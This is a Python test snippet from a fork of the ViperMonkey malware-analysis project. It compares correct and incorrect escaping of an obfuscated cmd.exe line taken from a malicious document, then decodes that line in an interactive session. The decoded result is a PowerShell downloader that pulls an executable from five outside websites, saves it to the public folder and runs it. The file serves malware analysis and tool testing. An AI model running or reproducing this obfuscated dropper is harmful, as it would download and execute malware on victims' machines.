forked from decalage2/ViperMonkey
-
Notifications
You must be signed in to change notification settings - Fork 0
/
badstring.py
18 lines (12 loc) · 5.13 KB
/
badstring.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
## good cmd, bad from vmonkey...
cmd = r'''CMd /V:/C"^s^e^t ?^{=/_- /\_^ ^\^-^_ -\/^ ^_-^\ -^_^\^ /-^_ ^-^_\ /^-^_^ _/\ /\^_^ ^_-/^ \/^_ ^-\/ /-^\^ /-_^ ^-_\^ /^-^_^}^\^-/^}^_^-^\^{^\/^-^h^_^\-c-^_\^t\^-/^a^\^_/c/-^\^}-^_^\;^-_^\^k^_\/a^\^_^-^e^_/\r\/^_^b-\^_^;^\/_^E/\_i^-\/^t-\^_$-\/ ^\^-^_^m_-^\e\/^-t-\_^I/^\^_^--^\/^e\^_/k^-^\^_^o-_/v\-_n^\^_/I-\^_^;^_/\)^\-/^E\_^-i/\-^t^-/_$/-^\^ _/^-,-/\h/^_\N^_^\/^w-^\/^$/_\(\/^-e_/^-l^-^\/^i/_-^F^_/^-^d^_^\-^a/-_o^\/_^l^_\-n-/^\^w-^_\^o^-/_D-_/./-_m^\_/^z^\-/^H^_^-\^$-^_/{-\/y_/^-r^-^_^\^t\^_-{-/_)-^\_J^_^-^\i/^-_^q_^-^\^$^_^-/^ -\/n/^-\i^\/- ^-/_h^-\^_N\^_/w_/\$/^_\(/-_^h/^-\c^\/_a^_/-e/_-r/^_^-^o^\-/^f^\-/;\^_^-^'\^_-^e/-^_^x/_^-^e/^-^\.^\/^_^'/^\^-+^-\_d^_\^-^G_-\W/_-^$^_/-+/^_-^'/_\\^\-_^'/\-^+-/_c\^_/^i/-_l/^-\b/-^_^u/-^_p\-^_:\-/v^\/^-n/_\e/^\-^$^-\_=^-/^_E^_/^-i^\/-t-/\$_/\;-/^_^'^\/^-^3^-_/^9_-\9^\-/^'^\/^-^ _/^\^=_/\ -/\^d^\^_^-G^\-/W-^_/$\^_/^;^_/-)/^_\'\/-@^-/\^'^\/^_(_/\t^-^_/i_-/l-/\p^\^_^-S_\/^.^_-/^'\-/t\^-^_m-^\^_^0^-/_V^-_^\l^-^_/p\^-_/^_/^\m/^-^_^o^\/_c/-_._^-^\^s/_\r/\^-^u^\/^_o^_-\^t_^-/^l^-/^_^e^-^_/v^-^_\a/^-^_r-/^\t/^_-o_/\^e^_^-\^g^_^-^\/_-//^_^-/:_\^-p^_/^\t/_-t-^_/h_\^-^@^\-/N_^-/V^_^-/H^_\/z/^-^\/-^_\m/\_^o/^\^_c\/_^._/-c_/^-^e/^\-t^-\_a_\-^b/_^\^m_^-/^e^_^\-^o^\_^-p_/^\u/^_^-r^-/\g_^\-/^_^\//^\/^_^:\/^-^p^\-/t/^\_^t/_^\^h-/_^@^-/^_l/^\^-^i-_//\^_-k^\-/^u/^\^_.^\/^-o^-/_c^-^_/^.^_/\^d-\/^t\^-^_^l^\^_^-s/-^_^s/^-_a^-^_/a^\_-m^\/_^-_^\-^w/-_//-_/^-/_^:\^-_^p^\/^-^t^-^\/^t^\-_^h^_^-/^@/^_\^a^_\/^5^-^_^\^8\_^-/^\/^_m^_-^\o\/_c-/^_^.^_-/^l-/\^o/_^-r^_-\^t\^-/n^_^\^-o-_/c-/^\i^_^-\m^_/^-e/\^-/_/-/^\^-^_^:^-_/p^\/^_^t^\^-/^t/-^_h/\^_@\^_/t-_^\^i/^\_C\-/T-^_\v\^-^_6/-^\e\^-^_//_^\^m_-\o/^-^\c/^\^_._-\n^_\-^e/^\-d-\^_r_-/^a/^_^\g/^\^_n-_/^g\^-_^i^\/-^s-/\e/^\^_^d/_^\e/^-_^t_\-i-_/^s-/^\b^-\/^e^_-\^w^_^\//^_^-//^-/^_^:^-/^\p^-/_t^-/\^t/-_h_^-/^'^-_/^=^\^-/J^_^\/i_-^\q_\/^$/-^\;/^-^\t^\/_n\-_^e^-/\i^-/\^l-\/C-\/^b^\^-_e/^\^-W\/-^./_^-^t^_-\e/_^\N^-/^_^ _/^\^t^\^-^_c\^-/^e-^\_j-\/b^_/-o^_/\^--^_/^w/\-e\/_n\^-_^=_^-\^m^-^\/z^\^-_^H\^_/$_^\/^ \/-^l^-/^_^l_^\-^e/^\-h\^_/^s_-/r/_-e^\^_-w_^\/o^_\/^p&&^f^or /^L %^X ^in (^1^4^5^5,-^4,3)^d^o ^s^et ^',=!^',!!?^{:~%^X,1!&&^if %^X ^l^e^q ^3 ca^l^l %^',:*^'^,^!^=%"'''
bad = '''CMd /V:/C"^s^e^t ?^{=/_- /\\_^ ^\\^-^_ -\\/^ ^_-^\\ -^_^\\^ /-^_ ^-^_\\ /^-^_^ _/\\ /\\^_^ ^_-/^ \\/^_ ^-\\/ /-^\\^ /-_^ ^-_\\^ /^-^_^}^\\^-/^}^_^-^\\^{^\\/^-^h^_^\\-c-^_\\^t\\^-/^a^\\^_/c/-^\\^}-^_^\\;^-_^\\^k^_\\/a^\\^_^-^e^_/\r\\/^_^b-\\^_^;^\\/_^E/\\_i^-\\/^t-\\^_$-\\/ ^\\^-^_^m_-^\\e\\/^-t-\\_^I/^\\^_^--^\\/^e\\^_/k^-^\\^_^o-_/v\\-_n^\\^_/I-\\^_^;^_/\\)^\\-/^E\\_^-i/\\-^t^-/_$/-^\\^ _/^-,-/\\h/^_\\N^_^\\/^w-^\\/^$/_\\(\\/^-e_/^-l^-^\\/^i/_-^F^_/^-^d^_^\\-^a/-_o^\\/_^l^_\\-n-/^\\^w-^_\\^o^-/_D-_/./-_m^\\_/^z^\\-/^H^_^-\\^$-^_/{-\\/y_/^-r^-^_^\\^t\\^_-{-/_)-^\\_J^_^-^\\i/^-_^q_^-^\\^$^_^-/^ -\\/n/^-\\i^\\/- ^-/_h^-\\^_N\\^_/w_/\\$/^_\\(/-_^h/^-\\c^\\/_a^_/-e/_-r/^_^-^o^\\-/^f^\\-/;\\^_^-^\'\\^_-^e/-^_^x/_^-^e/^-^\\.^\\/^_^\'/^\\^-+^-\\_d^_\\^-^G_-\\W/_-^$^_/-+/^_-^\'/_\\\\^\\-_^\'/\\-^+-/_c\\^_/^i/-_l/^-\\b/-^_^u/-^_p\\-^_:\\-/v^\\/^-n/_\\e/^\\-^$^-\\_=^-/^_E^_/^-i^\\/-t-/\\$_/\\;-/^_^\'^\\/^-^3^-_/^9_-\\9^\\-/^\'^\\/^-^ _/^\\^=_/\\ -/\\^d^\\^_^-G^\\-/W-^_/$\\^_/^;^_/-)/^_\\\'\\/-@^-/\\^\'^\\/^_(_/\t^-^_/i_-/l-/\\p^\\^_^-S_\\/^.^_-/^\'\\-/t\\^-^_m-^\\^_^0^-/_V^-_^\\l^-^_/p\\^-_/^_/^\\m/^-^_^o^\\/_c/-_._^-^\\^s/_\r/\\^-^u^\\/^_o^_-\\^t_^-/^l^-/^_^e^-^_/v^-^_\\a/^-^_r-/^\t/^_-o_/\\^e^_^-\\^g^_^-^\\/_-//^_^-/:_\\^-p^_/^\t/_-t-^_/h_\\^-^@^\\-/N_^-/V^_^-/H^_\\/z/^-^\\/-^_\\m/\\_^o/^\\^_c\\/_^._/-c_/^-^e/^\\-t^-\\_a_\\-^b/_^\\^m_^-/^e^_^\\-^o^\\_^-p_/^\\u/^_^-r^-/\\g_^\\-/^_^\\//^\\/^_^:\\/^-^p^\\-/t/^\\_^t/_^\\^h-/_^@^-/^_l/^\\^-^i-_//\\^_-k^\\-/^u/^\\^_.^\\/^-o^-/_c^-^_/^.^_/\\^d-\\/^t\\^-^_^l^\\^_^-s/-^_^s/^-_a^-^_/a^\\_-m^\\/_^-_^\\-^w/-_//-_/^-/_^:\\^-_^p^\\/^-^t^-^\\/^t^\\-_^h^_^-/^@/^_\\^a^_\\/^5^-^_^\\^8\\_^-/^\\/^_m^_-^\\o\\/_c-/^_^.^_-/^l-/\\^o/_^-r^_-\\^t\\^-/n^_^\\^-o-_/c-/^\\i^_^-\\m^_/^-e/\\^-/_/-/^\\^-^_^:^-_/p^\\/^_^t^\\^-/^t/-^_h/\\^_@\\^_/t-_^\\^i/^\\_C\\-/T-^_\\v\\^-^_6/-^\\e\\^-^_//_^\\^m_-\\o/^-^\\c/^\\^_._-\n^_\\-^e/^\\-d-\\^_r_-/^a/^_^\\g/^\\^_n-_/^g\\^-_^i^\\/-^s-/\\e/^\\^_^d/_^\\e/^-_^t_\\-i-_/^s-/^\\b^-\\/^e^_-\\^w^_^\\//^_^-//^-/^_^:^-/^\\p^-/_t^-/\\^t/-_h_^-/^\'^-_/^=^\\^-/J^_^\\/i_-^\\q_\\/^$/-^\\;/^-^\t^\\/_n\\-_^e^-/\\i^-/\\^l-\\/C-\\/^b^\\^-_e/^\\^-W\\/-^./_^-^t^_-\\e/_^\\N^-/^_^ _/^\\^t^\\^-^_c\\^-/^e-^\\_j-\\/b^_/-o^_/\\^--^_/^w/\\-e\\/_n\\^-_^=_^-\\^m^-^\\/z^\\^-_^H\\^_/$_^\\/^ \\/-^l^-/^_^l_^\\-^e/^\\-h\\^_/^s_-/r/_-e^\\^_-w_^\\/o^_\\/^p&&^f^or /^L %^X ^in (^1^4^5^5,-^4,3)^d^o ^s^et ^\',=!^\',!!?^{:~%^X,1!&&^if %^X ^l^e^q ^3 ca^l^l %^\',:*^\'^,^!^=%"'''
bad=bad.replace('\r','\\r')
bad=bad.replace('\t','\\t')
bad=bad.replace('\n','\\n')
>>> len(bad)
2153
>>> a,sep,b=bad.partition("&&")
>>> a[::-1].replace('^','')[::4]
"powershell $Hzm=new-object Net.WebClient;$qiJ='http://websitedesigngarden.com/e6vTCit@http://emicontrol.com/85a@http://w-maassltd.co.uk/il@http://grupoembatec.com/zHVN@http://geotraveltours.com/plV0mt'.Split('@');$WGd = '993';$tiE=$env:public+'\\'+$WGd+'.exe';foreach($wNh in $qiJ){try{$Hzm.DownloadFile($wNh, $tiE);Invoke-Item $tiE;break;}catch{}} =tC/C"
so.... it's... unfuckable, if we know what the initial fuckery can be.